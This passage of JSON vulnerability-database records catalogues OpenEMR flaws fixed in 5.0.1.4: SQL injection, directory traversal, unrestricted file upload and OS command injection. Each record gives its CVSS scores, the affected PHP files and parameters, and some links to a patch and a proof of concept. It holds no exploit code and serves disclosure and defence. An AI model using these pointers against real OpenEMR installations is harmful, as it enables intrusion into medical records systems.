"AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:31:00", "description": "SQL injection vulnerability in interface/de_identification_forms/find_code_popup.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the 'search_term' parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T17:29:00", "type": "cve", "title": "CVE-2018-15151", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15151"], "modified": "2018-10-12T13:11:00", "cpe": ["cpe:/a:open-emr:openemr:5.0.1.3"], "id": "CVE-2018-15151", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15151", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:open-emr:openemr:5.0.1.3:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-07T14:30:49", "description": "SQL injection vulnerability in interface/de_identification_forms/find_drug_popup.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary SQL commands via the search_term parameter.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15144", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15144"], "modified": "2018-10-10T18:12:00", "cpe": [], "id": "CVE-2018-15144", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15144", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:47", "description": "Multiple SQL injection vulnerabilities in portal/add_edit_event_user.php in versions of OpenEMR before 5.0.1.4 allow a remote attacker to execute arbitrary SQL commands via the (1) eid, (2) userid, or (3) pid parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15145", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15145"], "modified": "2018-10-10T18:11:00", "cpe": [], "id": "CVE-2018-15145", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15145", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:46", "description": "Multiple SQL injection vulnerabilities in portal/find_appt_popup_user.php in versions of OpenEMR before 5.0.1.4 allow a remote attacker to execute arbitrary SQL commands via the (1) catid or (2) providerid parameter.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15143", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15143"], "modified": "2018-10-10T18:18:00", "cpe": [], "id": "CVE-2018-15143", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15143", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:46", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to execute arbitrary PHP code by writing a file with a PHP extension via the \"docid\" and \"content\" parameters and accessing it in the traversed directory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15142", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15142"], "modified": "2018-10-10T18:21:00", "cpe": [], "id": "CVE-2018-15142", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15142", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:45", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to delete arbitrary files via the \"docid\" parameter when the mode is set to delete.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15141", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15141"], "modified": "2018-10-10T18:20:00", "cpe": [], "id": "CVE-2018-15141", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15141", "cvss": {"score": 5.5, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:48", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to read arbitrary files via the \"docid\" parameter when the mode is set to get.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15140", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15140"], "modified": "2018-10-10T18:23:00", "cpe": [], "id": "CVE-2018-15140", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15140", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2023-06-07T14:30:50", "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-13T18:29:00", "type": "cve", "title": "CVE-2018-15139", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2022-02-10T07:23:00", "cpe": [], "id": "CVE-2018-15139", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-15139", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "attackerkb": [{"lastseen": "2023-06-07T15:12:07", "description": "OS command injection occurring in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary commands by making a crafted request to interface/main/daemon_frame.php after modifying the \u201chylafax_server\u201d global variable in interface/super/edit_globals.php.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-15T00:00:00", "type": "attackerkb", "title": "CVE-2018-15153", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15153"], "modified": "2020-06-05T00:00:00", "id": "AKB:C4DD3F24-796A-4A1A-8E1E-DE5E4F6D3E48", "href": "https://attackerkb.com/topics/KXEnyG0EPi/cve-2018-15153", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:09:16", "description": "Directory traversal in portal/import_template.php in versions of OpenEMR before 5.0.1.4 allows a remote attacker authenticated in the patient portal to execute arbitrary PHP code by writing a file with a PHP extension via the \u201cdocid\u201d and \u201ccontent\u201d parameters and accessing it in the traversed directory.\n\n \n**Recent assessments:** \n \n**noraj** at June 24, 2021 12:00pm UTC reported:\n\nThe file upload is totally unrestricted but an account is required.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-13T00:00:00", "type": "attackerkb", "title": "CVE-2018-15142", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15142"], "modified": "2020-06-05T00:00:00", "id": "AKB:8B5B4AAA-0168-4A40-A5D1-C502E981E3D6", "href": "https://attackerkb.com/topics/OFhXc3HEMx/cve-2018-15142", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:08:59", "description": "Unrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote authenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload form and accessing it in the images directory.\n\n \n**Recent assessments:** \n \n**noraj** at July 08, 2021 7:45pm UTC reported:\n\n * Title: OpenEMR &lt; 5.0.1.4 \u2013 (Authenticated) File upload \u2013 Remote command execution \n\n * Vulnerable version: &lt; 5.0.1.4 (it means up to 5.0.1.3) \n\n * Patch: <https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485> \n\n * Docker PoC: <https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml> \n\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-13T00:00:00", "type": "attackerkb", "title": "CVE-2018-15139", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139"], "modified": "2020-06-05T00:00:00", "id": "AKB:488ABDDA-9BC6-4701-BDC0-E87692E75C17", "href": "https://attackerkb.com/topics/Bm7UPQNfBQ/cve-2018-15139", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerability in OpenEMR Anything_simple.php encounter parameter\n\nVulnerability Type: SQL Injection", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR Anything_simple.php SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15149"], "modified": "2018-08-18T00:00:00", "id": "E-659", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "SQL Injection vulnerability in OpenEMR find_appt_popup_user.php catid parameter\n\nVulnerability Type: SQL Injection", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR find_appt_popup_user.php SQL Injection", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15143"], "modified": "2018-08-18T00:00:00", "id": "E-657", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File upload vulnerability in OpenEMR import_template.php docid parameter\n\nVulnerability Type: File Upload", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR File Upload", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15142"], "modified": "2018-08-18T00:00:00", "id": "E-656", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "File disclosure vulnerability in OpenEMR import_template.php docid parameter\n\nVulnerability Type: File Disclosure", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-08-18T00:00:00", "type": "dsquare", "title": "OpenEMR File Disclosure", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15140"], "modified": "2018-08-18T00:00:00", "id": "E-658", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:31:45", "description": "p0wny Shell is a PHP shell. An attacker might use this shell to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "checkpoint_advisories", "title": "p0wny Shell Remote Code Execution (CVE-2017-9830; CVE-2018-15139; CVE-2018-19423; CVE-2018-6383; CVE-2020-29607; CVE-2021-24155; CVE-2021-24347)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9830", "CVE-2018-15139", "CVE-2018-19423", "CVE-2018-6383", "CVE-2020-29607", "CVE-2021-24155", "CVE-2021-24347"], "modified": "2021-10-19T00:00:00", "id": "CPAI-2021-0765", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}